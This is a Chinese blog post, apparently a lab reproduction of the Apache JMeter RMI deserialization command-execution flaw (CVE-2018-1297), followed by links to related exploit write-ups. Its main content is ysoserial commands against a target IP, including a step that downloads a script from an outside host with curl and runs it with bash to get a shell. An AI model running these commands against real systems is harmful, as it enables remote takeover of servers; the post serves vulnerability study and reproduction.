Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

于 2023-03-14 14:44:12 发布
阅读量568 收藏
点赞数
文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzz1284/article/details/129527450
版权
ApacheJMeter的2.x和3.x版本存在反序列化漏洞,允许攻击者通过ysoserial工具执行任意命令。攻击者可以利用RMIRegistryExploit进行exploit,创建反弹shell,例如下载并执行远程脚本,从而对目标服务器造成潜在危害。
摘要由CSDN通过智能技术生成

原因

Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。

复现

直接使用ysoserial即可进行利用: 

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'touch /tmp/success'

反弹shell

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'curl http://216.127.164.238:7890/1.txt -o /tmp/shell.sh'

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 '/bin/bash /tmp/shell.sh'

n1ght_X
关注
MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)
0xSec
12-16 1352
MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Jmeter RMI 反序列化命令执行漏洞复现
Tauil的博客
08-02 858
针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload。可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令。靶场:vulhub—jmeter/CVE-2018-1297/根据输入命令转化为对应序列化内容,然后将消息发送。...
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 893
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1066
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297
JiangBuLiu的博客
07-11 2448
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ 漏洞原理 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...
jmeter-plugins-cmn-jmeter-0.6.jar
08-20
Apache jmeter jmeter-plugins-cmn-jmeter-0.6.jar 下载
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 509
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 488
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java RMI客户端调用远程服务器系统命令
04-06
NULL 博文链接:https://skyandcity.iteye.com/blog/1547028
rmi远程代码执行漏洞_WebSphere 远程代码执行漏洞CVE20204450
weixin_39820173的博客
01-05 776
漏洞名称:WebSphere 远程代码执行漏洞CVE-2020-4450威胁等级:高危影响范围:WebSphere Application Server 9.0.0.0 - 9.0.5.4WebSphere Application Server 8.5.0.0 - 8.5.5.17漏洞类型:远程代码执行利用难度:中等漏洞分析1 WebSphere 组件介绍WebSphere 是 IB...
rmi远程代码执行漏洞_CVE-2019-19781 远程代码执行漏洞深入分析
weixin_39912580的博客
12-22 310
环境搭建然后选择下载NSVPX-ESX-13.0-47.22_nc_64.zip这个文件,该文件是ovf,可以直接用vmware来倒入并打开选择导入先后配置 IP地址,子网掩码,的网关地址,然后选择4确认默认用户名密码都是 nsroot然后访问之前设置的IP地址,出现以下界面则环境搭建成功漏洞复现使用方式输入要执行命令漏洞复现成功漏洞分析首先查看我们的请求路径,由于利用了目录遍历漏洞,所以访问的...
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 234
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 3309
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
"JMeter参数化设置功能-函数助手Java压力测试工具
参数化设置是JMeter中非常重要的功能之一,它可以帮助我们在压力测试中灵活地设置请求的参数。在JMeter的函数助手中,有一个内置的函数叫做_Random,我们可以利用它来实现参数的随机化设置。 JMeter是一个由Apache...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值